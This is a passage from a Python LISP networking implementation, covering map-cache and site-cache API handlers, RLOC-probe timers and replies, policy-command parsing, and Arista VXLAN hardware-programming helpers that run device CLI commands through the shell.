if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if ("dns-name" in data) else None
if ("address" in data):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in list(lisp_map_servers_list.values()):
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (device in lisp_myinterfaces):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (device not in lisp_myinterfaces): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_multicast_rloc
#
# Time-out member RLOCs for this mutlicast RLOC. Check if an RLOC-probe reply
# has been received within the timeout interval.
#
def lisp_process_multicast_rloc(multicast_rloc):
maddr = multicast_rloc.rloc.print_address_no_iid()
now = lisp_get_timestamp()
for addr in multicast_rloc.multicast_rloc_probe_list:
mrloc = multicast_rloc.multicast_rloc_probe_list[addr]
if (mrloc.last_rloc_probe_reply + LISP_RLOC_PROBE_REPLY_WAIT >= now):
continue
#endif
if (mrloc.state == LISP_RLOC_UNREACH_STATE): continue
#
# It went down.
#
mrloc.state = LISP_RLOC_UNREACH_STATE
mrloc.last_state_change = lisp_get_timestamp()
lprint("Multicast-RLOC {} member-RLOC {} went unreachable".format( \
maddr, red(addr, False)))
#endfor
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in list(lisp_rloc_probe_list.values()):
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Time-out member RLOCs for multicast RLOC probing.
#
if (rloc.multicast_rloc_probe_list != {}):
lisp_process_multicast_rloc(rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (rtr_str not in lisp_rtr_list): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc, rloc_name):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (map_reply_addr not in mrloc.multicast_rloc_probe_list):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.rloc_name = rloc_name
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (addr not in pl):
addr += ":" + str(port)
if (addr not in pl):
addr = source_addr
if (addr not in pl):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (rloc_str in lisp_nonce_echo_list):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = b""
while(packet[0:1] != b"\x00"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name.decode())
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in list(kv_pair.keys()):
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
